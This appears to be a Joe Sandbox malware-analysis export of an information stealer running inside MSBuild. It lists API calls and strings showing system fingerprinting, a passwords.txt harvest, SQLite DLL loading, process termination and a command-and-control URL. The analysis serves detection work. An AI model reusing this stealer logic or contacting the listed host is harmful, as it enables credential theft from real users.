GetProcAddress.KERNEL32 ref: 00418932
GetProcAddress.KERNEL32 ref: 00418949
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041895A
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041896B
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041897C
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041898D
LoadLibraryA.KERNEL32(?,004185D2), ref: 0041899E
GetProcAddress.KERNEL32(75070000,004185D2), ref: 004189BA
GetProcAddress.KERNEL32(75FD0000,004185D2), ref: 004189D5
GetProcAddress.KERNEL32 ref: 004189EC
GetProcAddress.KERNEL32(75A50000,004185D2), ref: 00418A07
GetProcAddress.KERNEL32(74E50000,004185D2), ref: 00418A22
GetProcAddress.KERNEL32(76E80000,004185D2), ref: 00418A3D
GetProcAddress.KERNEL32 ref: 00418A54

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction ID: 199c42d56f0628ccab12840d69b6f02f13cfb0cf7a8249375453f6caf445ef8e
Opcode Fuzzy Hash: 98b88b5f96dc66c065c06141136ba5df242bfcb15761572c331c610d89b40f79
Instruction Fuzzy Hash: 2B7106B5910312AFEF1ADF60FD488243BA7F70874BF11A426E91582270EB374A64EF55

Function 00413B86 Relevance: 47.9, APIs: 2, Strings: 25, Instructions: 674
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,004365B6,?,?,?), ref: 00410CD8
Part of subcall function 00410CC0: HeapAlloc.KERNEL32(00000000), ref: 00410CDF
Part of subcall function 00410CC0: GetLocalTime.KERNEL32(?), ref: 00410CEB
Part of subcall function 00410CC0: wsprintfA.USER32 ref: 00410D16

Part of subcall function 004115D4: _memset.LIBCMT ref: 00411607
Part of subcall function 004115D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00411626
Part of subcall function 004115D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0041164B
Part of subcall function 004115D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00411657
Part of subcall function 004115D4: CharToOemA.USER32(?,?), ref: 0041166B

Part of subcall function 00411684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0041169F
Part of subcall function 00411684: _memset.LIBCMT ref: 004116CE
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 004116F6
Part of subcall function 00411684: lstrcatA.KERNEL32(?,00436ECC,?,?,?,?,?), ref: 00411713

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 004109A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 004109D5
Part of subcall function 004109A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00410A15
Part of subcall function 004109A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00410A6A
Part of subcall function 004109A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00410A71

GetCurrentProcessId.KERNEL32(Path: ,0043687C,HWID: ,00436870,GUID: ,00436864,00000000,MachineID: ,00436854,00000000,Date: ,00436848,00436844,004379AC,Version: ,004365B6), ref: 00413DDB

Part of subcall function 0041224A: OpenProcess.KERNEL32(00000410,00000000,=A,00000000,?), ref: 0041226C
Part of subcall function 0041224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00412287
Part of subcall function 0041224A: CloseHandle.KERNEL32(00000000), ref: 0041228E

Part of subcall function 00410B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B44
Part of subcall function 00410B30: HeapAlloc.KERNEL32(00000000,?,?,?,00413E95,Windows: ,004368A0), ref: 00410B4B

Part of subcall function 00411807: __EH_prolog3_catch_GS.LIBCMT ref: 0041180E
Part of subcall function 00411807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00413EF9,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 0041181F
Part of subcall function 00411807: CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00411830
Part of subcall function 00411807: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 0041184A
Part of subcall function 00411807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411880
Part of subcall function 00411807: VariantInit.OLEAUT32(?), ref: 004118DB

Part of subcall function 00411997: __EH_prolog3_catch.LIBCMT ref: 0041199E
Part of subcall function 00411997: CoInitializeEx.OLE32(00000000,00000000,00000030,00413F67,?,AV: ,004368C4,Install Date: ,004368B0,00000000,Windows: ,004368A0,Work Dir: In memory,00436888), ref: 004119AD
Part of subcall function 00411997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 004119BE
Part of subcall function 00411997: CoCreateInstance.OLE32(00432F00,00000000,00000001,00432E30,?), ref: 004119D8
Part of subcall function 00411997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00411A0E
Part of subcall function 00411997: VariantInit.OLEAUT32(?), ref: 00411A5D

Part of subcall function 00410C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00401385), ref: 00410C91
Part of subcall function 00410C85: HeapAlloc.KERNEL32(00000000,?,?,?,00401385), ref: 00410C98
Part of subcall function 00410C85: GetComputerNameA.KERNEL32(00000000,00401385), ref: 00410CAC

Part of subcall function 00410C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004013B9), ref: 00410C5F
Part of subcall function 00410C53: HeapAlloc.KERNEL32(00000000,?,?,?,004013B9), ref: 00410C66
Part of subcall function 00410C53: GetUserNameA.ADVAPI32(00000000,004013B9), ref: 00410C7A

Part of subcall function 00411563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00411575
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00411580
Part of subcall function 00411563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0041158B
Part of subcall function 00411563: ReleaseDC.USER32(00000000,00000000), ref: 00411596
Part of subcall function 00411563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4), ref: 004115A2
Part of subcall function 00411563: HeapAlloc.KERNEL32(00000000,?,?,00414098,?,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 004115A9
Part of subcall function 00411563: wsprintfA.USER32 ref: 004115BB

Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000,0043670D,?,?), ref: 00410E0C
Part of subcall function 00410DDB: LocalAlloc.KERNEL32(00000040,00000000), ref: 00410E1A
Part of subcall function 00410DDB: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00410E28
Part of subcall function 00410DDB: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00410E57
Part of subcall function 00410DDB: LocalFree.KERNEL32(00000000), ref: 00410EFF

Part of subcall function 00410D2E: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00410D49
Part of subcall function 00410D2E: HeapAlloc.KERNEL32(00000000), ref: 00410D50
Part of subcall function 00410D2E: GetTimeZoneInformation.KERNEL32(?), ref: 00410D5F
Part of subcall function 00410D2E: wsprintfA.USER32 ref: 00410D7D

Part of subcall function 00410F51: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C), ref: 00410F65
Part of subcall function 00410F51: HeapAlloc.KERNEL32(00000000,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410F6C
Part of subcall function 00410F51: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ), ref: 00410F8A
Part of subcall function 00410F51: RegQueryValueExA.KERNEL32(00436888,00000000,00000000,00000000,000000FF,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000), ref: 00410FA6
Part of subcall function 00410F51: RegCloseKey.ADVAPI32(00436888,?,?,?,00414252,Processor: ,[Hardware],00436950,00000000,TimeZone: ,00436940,00000000,Local Time: ,0043692C,Keyboard Languages: ,00436910), ref: 00410FAF

Part of subcall function 00411007: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 0041107D
Part of subcall function 00411007: wsprintfA.USER32 ref: 004110DB

Part of subcall function 00410FBA: GetSystemInfo.KERNEL32(?), ref: 00410FD4
Part of subcall function 00410FBA: wsprintfA.USER32 ref: 00410FEC

Part of subcall function 00411119: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000,Computer Name: ,004368D0,AV: ,004368C4,Install Date: ), ref: 00411131
Part of subcall function 00411119: HeapAlloc.KERNEL32(00000000), ref: 00411138
Part of subcall function 00411119: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00411154
Part of subcall function 00411119: wsprintfA.USER32 ref: 0041117A

Part of subcall function 00411192: EnumDisplayDevicesA.USER32(00000000,00000000,?,00000001), ref: 004111E9

Part of subcall function 004114A5: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00436712,?,?), ref: 004114D4
Part of subcall function 004114A5: Process32First.KERNEL32(00000000,00000128), ref: 004114E4
Part of subcall function 004114A5: Process32Next.KERNEL32(00000000,00000128), ref: 00411542
Part of subcall function 004114A5: CloseHandle.KERNEL32(00000000), ref: 0041154D

Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0043670F,00000000,?,?), ref: 00411273
Part of subcall function 00411203: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 004112B0
Part of subcall function 00411203: wsprintfA.USER32 ref: 004112DD
Part of subcall function 00411203: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 004112FC
Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00411332
Part of subcall function 00411203: lstrlenA.KERNEL32(?), ref: 00411347

Part of subcall function 00411203: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,00436E8C), ref: 004113DC
Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411446
Part of subcall function 00411203: RegCloseKey.ADVAPI32(?), ref: 00411472

lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,00436910,Display Resolution: ,004368F4,00000000,User Name: ,004368E4,00000000), ref: 00414563

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

Strings

Date: , xrefs: 00413C1F
Path: , xrefs: 00413DBB
User Name: , xrefs: 0041400E
information.txt, xrefs: 00414573
MachineID: , xrefs: 00413C80
Display Resolution: , xrefs: 0041406F
TimeZone: , xrefs: 004141AC
[Software], xrefs: 004144A3
HWID: , xrefs: 00413D4E
Install Date: , xrefs: 00413ED1
Cores: , xrefs: 0041428E
Work Dir: In memory, xrefs: 00413E30
Version: , xrefs: 00413B9F
[Hardware], xrefs: 0041420D
GUID: , xrefs: 00413CE1
VideoCard: , xrefs: 004143B7
Windows: , xrefs: 00413E70
Computer Name: , xrefs: 00413FAD
[Processes], xrefs: 0041442A
Threads: , xrefs: 004142EF
Keyboard Languages: , xrefs: 004140DE
RAM: , xrefs: 00414350
Processor: , xrefs: 0041422D
Local Time: , xrefs: 0041414B
AV: , xrefs: 00413F3E

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceEnumHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDevicesDirectoryDisplayFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
String ID: AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
API String ID: 23247351-1014693891
Opcode ID: 7a46959f5221a3ecf59d0b49526b51229a01ec7697e4ef637f3ce16e9305e42c
Instruction ID: 8a42f407c24202d7a6dd8fa6120b12fd45f2decad8a8e81766ce9a60c8fe54d8
Opcode Fuzzy Hash: 7a46959f5221a3ecf59d0b49526b51229a01ec7697e4ef637f3ce16e9305e42c
Instruction Fuzzy Hash: EB527D71D4001EAACF01FBA2DD429DDB7B5AF04308F51456BB610771A1DBB87E8E8B98

Function 004169B6 Relevance: 45.8, APIs: 9, Strings: 17, Instructions: 315
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410549: lstrlenA.KERNEL32(?,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 0041054F
Part of subcall function 00410549: lstrcpyA.KERNEL32(00000000,00000000,?,00417284,004366CF,004366CE,?,?,?,?,0041869F), ref: 00410581

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 0041683E: StrCmpCA.SHLWAPI(?,ERROR), ref: 00416873

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416AC2

Part of subcall function 004168C6: StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416925
Part of subcall function 004168C6: StrStrA.SHLWAPI(00000000,?), ref: 0041693A
Part of subcall function 004168C6: lstrlenA.KERNEL32(?), ref: 00416949
Part of subcall function 004168C6: lstrlenA.KERNEL32(00000000), ref: 00416962

StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B1F
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416B78
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416BD8
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C31
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416C47
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416CA7
StrCmpCA.SHLWAPI(?,ERROR), ref: 00416D00
Sleep.KERNEL32(0000EA60), ref: 00416D0F

Strings

ERROR, xrefs: 00416BD0
sqlp.dll, xrefs: 00416DAC
>wA, xrefs: 00416E2D
ERROR, xrefs: 00416B70
http://lade.petperfectcare.com:80, xrefs: 00416A54
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416D8D
sql.dll, xrefs: 00416E0E
sqlp.dll, xrefs: 00416DDD
ERROR, xrefs: 00416C29
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416DBE
ERROR, xrefs: 00416C9F
ERROR, xrefs: 00416C3F
Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0, xrefs: 00416D25
ERROR, xrefs: 00416ABA
sqlp.dll, xrefs: 00416D44
ERROR, xrefs: 00416B17
ERROR, xrefs: 00416CF8

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: >wA$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0$http://lade.petperfectcare.com:80$sql.dll$sqlp.dll$sqlp.dll$sqlp.dll
API String ID: 507064821-3052648669
Opcode ID: d6a0b5c5444a4ccf3efbfa7656036f48e37d140efc54fa1caf20e42d6c103a14
Instruction ID: c90f6ea4a5ca348140cab4ba7e9dbaa9ca4af95923ca0130c421cdf06f76cfec
Opcode Fuzzy Hash: d6a0b5c5444a4ccf3efbfa7656036f48e37d140efc54fa1caf20e42d6c103a14
Instruction Fuzzy Hash: 0FC15C31E40118ABCF10FB66DD47ACCB775AF04308F51406BF815B7192DBB8AE898B99

Function 0040884C Relevance: 42.4, APIs: 23, Strings: 1, Instructions: 405
memoryfilestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00410795: StrCmpCA.SHLWAPI(?,?,?,00408863,?,?,?), ref: 0041079E

CopyFileA.KERNEL32(?,?,00000001), ref: 00408941

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 004122B0: _memset.LIBCMT ref: 004122D7
Part of subcall function 004122B0: OpenProcess.KERNEL32(00001001,00000000,?,00000000,?), ref: 0041237D
Part of subcall function 004122B0: TerminateProcess.KERNEL32(00000000,00000000), ref: 0041238B
Part of subcall function 004122B0: CloseHandle.KERNEL32(00000000), ref: 00412392

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408AA6
RtlAllocateHeap.NTDLL(00000000), ref: 00408AAD
StrCmpCA.SHLWAPI(?,ERROR_RUN_EXTRACTOR), ref: 00408B95
StrCmpCA.SHLWAPI(?,004371E8), ref: 00408BAB
StrCmpCA.SHLWAPI(?,004371EC), ref: 00408BD3
lstrlenA.KERNEL32(?), ref: 00408CF0
lstrlenA.KERNEL32(?), ref: 00408D0B

Part of subcall function 00416FA7: CreateThread.KERNEL32(00000000,00000000,00416ED6,?,00000000,00000000), ref: 00417046
Part of subcall function 00416FA7: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 0041704E

DeleteFileA.KERNEL32(?), ref: 00408D4E

Strings

ERROR_RUN_EXTRACTOR, xrefs: 00408B8F

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpy$Processlstrlen$FileHeaplstrcat$AllocateCloseCopyCreateDeleteHandleObjectOpenSingleTerminateThreadWait_memset
String ID: ERROR_RUN_EXTRACTOR
API String ID: 2819533921-2709115261
Opcode ID: 077028fa3e716a35bf32b89dafc6fd792268f45b4b1644074680612183489aa6
Instruction ID: b1bb328f08e938e4400443fd48ceaf11af5fc61e9b4d8feda928490e573589d9
Opcode Fuzzy Hash: 077028fa3e716a35bf32b89dafc6fd792268f45b4b1644074680612183489aa6
Instruction Fuzzy Hash: 02E14F71A00209AFCF01FFA1ED4A9DD7B76AF04309F10502AF541B71A1DB796E958F98

Function 0040852E Relevance: 38.7, APIs: 21, Strings: 1, Instructions: 230
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00411C4A: GetSystemTime.KERNEL32(?,00436701,?), ref: 00411C79

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

CopyFileA.KERNEL32(?,?,00000001), ref: 004085D3
GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00408628
RtlAllocateHeap.NTDLL(00000000), ref: 0040862F
lstrlenA.KERNEL32(?), ref: 004086CB
lstrcatA.KERNEL32(?), ref: 004086E4
lstrcatA.KERNEL32(?,?), ref: 004086EE
lstrcatA.KERNEL32(?,0043719C), ref: 004086FA
lstrcatA.KERNEL32(?,?), ref: 00408704
lstrcatA.KERNEL32(?,004371A0), ref: 00408710
lstrcatA.KERNEL32(?), ref: 0040871D
lstrcatA.KERNEL32(?,?), ref: 00408727
lstrcatA.KERNEL32(?,004371A4), ref: 00408733
lstrcatA.KERNEL32(?), ref: 00408740
lstrcatA.KERNEL32(?,?), ref: 0040874A
lstrcatA.KERNEL32(?,004371A8), ref: 00408756
lstrcatA.KERNEL32(?), ref: 00408763
lstrcatA.KERNEL32(?,?), ref: 0040876D
lstrcatA.KERNEL32(?,004371AC), ref: 00408779
lstrcatA.KERNEL32(?,004371B0), ref: 00408785
lstrlenA.KERNEL32(?), ref: 004087BE
DeleteFileA.KERNEL32(?), ref: 0040880B

Strings

passwords.txt, xrefs: 004087CE

Memory Dump Source

Source File: 00000001.00000002.3355779922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.3355779922.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.3355779922.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
